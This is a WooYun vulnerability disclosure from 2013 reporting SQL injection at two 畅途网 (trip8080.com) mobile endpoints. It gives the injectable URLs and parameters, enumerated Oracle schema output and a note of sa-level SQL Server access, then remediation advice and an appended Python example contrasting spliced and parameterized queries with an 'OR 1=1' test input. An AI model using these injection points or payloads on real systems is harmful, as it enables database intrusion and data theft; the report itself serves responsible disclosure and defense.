Vulnerability summary

Defect ID: wooyun-2013-021035

Title: Multiple injections on 畅途网 - lots and lots of data

Vendor: 畅途网

Author: 小胖子

Submitted: 2013-03-31 20:58

Fix time: 2013-05-15 20:58

Disclosed: 2013-05-15 20:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-03-31: Details sent to the vendor, awaiting the vendor's handling
2013-03-31: Vendor confirmed; details visible to the vendor only
2013-04-10: Details disclosed to core white hats and relevant domain experts
2013-04-20: Details disclosed to regular white hats
2013-04-30: Details disclosed to intern white hats
2013-05-15: Details disclosed to the public

Brief description:

This time the amount of data is frightening. Fix it fast, and you underground-economy guys, go easy. There's sa as well.

Detailed description:

You can't let your guard down on the WAP site either!
Injection point 1: http://100wap.trip8080.com/tbDetail.htm?currentPage=1&hotFlag=&stCity=%E5%8E%A6%E9%97%A8%E5%B8%82&endCity=%E6%B7%B1%E5%9C%B3%E5%B8%82&stCityId=70790&endCityId=46&pkTimetableId=1046556
Injected parameter: pkTimetableId (other parameters may be injectable too). Database type: Oracle
22 databases; it looks like the main site got hit along with it.

available databases [22]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PROD
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] TTS_CMS
[*] TTS_COA
[*] TTS_ECM
[*] TTS_EXM
[*] TTS_FND
[*] TTS_HR
[*] WMSYS
[*] XDB


Current database at this injection point: PROD, 219 tables. So happy to see things like user tables.



I won't list the rest one by one.
Injection point 2: http://3g.trip8080.com/chepiao/querySch.htm?stCityInfo=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582%2C1&carryStaId=-1&busStopId=310000&busStopName=%25E4%25B8%258A%25E6%25B5%25B7&planDate=20130331&timeSta=00%3A00-24%3A00-d
Injected parameter: carryStaId (other parameters may be injectable too). Database type: Microsoft SQL Server 2008
DBA privileges (this one is far too dangerous).
I didn't read out the data one by one; that's bad for you and bad for me, so I stopped there and reported it promptly for fixing.

(Screenshot attached: QQ截图20130331205335.jpg)


Proof of vulnerability:

See the detailed description.

Remediation:

1: Lower the database privileges at injection point 2; running as sa is indecent. Filter input.
2: Injection point 1: filter, filter, filter; don't neglect the WAP site either.
3: Change the admin backend address.
4: Rank has to be 20, right?!!! And how about a gift?!!!!

Copyright notice: when reposting, please credit the source 小胖子@乌云
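The "filter" half of points 1 and 2 above, shown as an added example that is not code from the report or from 畅途网: the id parameters at both injection points (pkTimetableId, carryStaId) are integers in every legitimate request, so the handler should reject anything else and bind the value as a query parameter rather than splicing it into the SQL text. The table, column names and sqlite3 backend are constructed stand-ins for the Oracle/SQL Server lookups behind tbDetail.htm and querySch.htm.

```python
import re
import sqlite3

# Constructed stand-in for the timetable table behind tbDetail.htm;
# sqlite3 is used only so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE timetables (pk_timetable_id INTEGER PRIMARY KEY, "
        "st_city TEXT, end_city TEXT)"
    )
    conn.executemany("INSERT INTO timetables VALUES (?, ?, ?)", [
        (1046556, "Xiamen", "Shenzhen"),
        (1046557, "Xiamen", "Guangzhou"),
        (1046558, "Beijing", "Shanghai"),
    ])
    return conn

def timetable_detail_vulnerable(conn, pk_timetable_id):
    # The request parameter is spliced straight into the SQL text:
    # the flaw the report describes. Any non-numeric input changes the query.
    sql = ("SELECT pk_timetable_id, st_city, end_city FROM timetables "
           "WHERE pk_timetable_id = " + pk_timetable_id)
    return conn.execute(sql).fetchall()

def parse_id(raw):
    # pkTimetableId and carryStaId are plain (possibly negative, e.g. -1)
    # integers in every legitimate request, so accept nothing else.
    if not isinstance(raw, str) or re.fullmatch(r"-?\d+", raw) is None:
        raise ValueError("invalid id parameter: %r" % (raw,))
    return int(raw)

def timetable_detail_hardened(conn, pk_timetable_id):
    # Validate the type first, then bind it as a parameter so the value
    # can only ever be compared as data, never reinterpreted as SQL.
    return conn.execute(
        "SELECT pk_timetable_id, st_city, end_city FROM timetables "
        "WHERE pk_timetable_id = ?",
        (parse_id(pk_timetable_id),),
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(timetable_detail_vulnerable(db, "1046556 OR 1=1"))  # every row leaks
    try:
        timetable_detail_hardened(db, "1046556 OR 1=1")
    except ValueError as err:
        print("rejected:", err)
    print(timetable_detail_hardened(db, "1046556"))  # exactly one row
```

The privilege half of point 1 (not running the SQL Server login as sa/sysadmin) is a server-side account configuration change and is not something application code can demonstrate.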


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2013-03-31 21:55

Vendor reply:

Thank you very much

Latest status:

None yet